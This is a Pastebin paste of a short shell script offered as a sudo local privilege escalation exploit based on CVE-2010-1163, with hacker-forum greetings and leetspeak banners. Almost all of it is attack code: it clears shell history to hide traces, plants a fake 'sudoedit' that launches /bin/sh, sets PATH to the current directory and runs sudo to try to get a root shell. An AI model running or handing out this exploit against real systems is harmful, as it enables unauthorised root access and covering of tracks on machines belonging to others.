Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/sh
- # the return of local privilege escalation through PATH manipulation
- # Bug re-discovered by VipVince #HF
- # VipVince 2013
- # Thanks LevelUp @HF for rbash help, irish br0z for life
- # http://www.hackforums.net/member.php?action=profile&uid=7807
- echo " ################################################
- # sudo <= 1.8 priv esc (based on CVE-2010-1163)#
- # - VipVince #greetz to HF (2013) #
- # 4b0u7 t0 dr0p r007 5h3ll!! #
- ################################################"
- echo "0day0day0day0day0day0day0day0day0day"
- echo "f1r57 w3 br34k 0u7 0f rb45h"
- history -c # clear it homie
- export HISTFILE="~/.bashrc"
- export PATH="/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin"
- echo "/bin/sh" > sudoedit
- chmod +x sudoedit
- id
- export PATH=.
- /usr/bin/sudo sudoedit /etc/hosts
- id
- echo "1f y0u 4r3 n07 r007, 7ry 4g41n 5k1dz"
Add Comment
Please, Sign In to add comment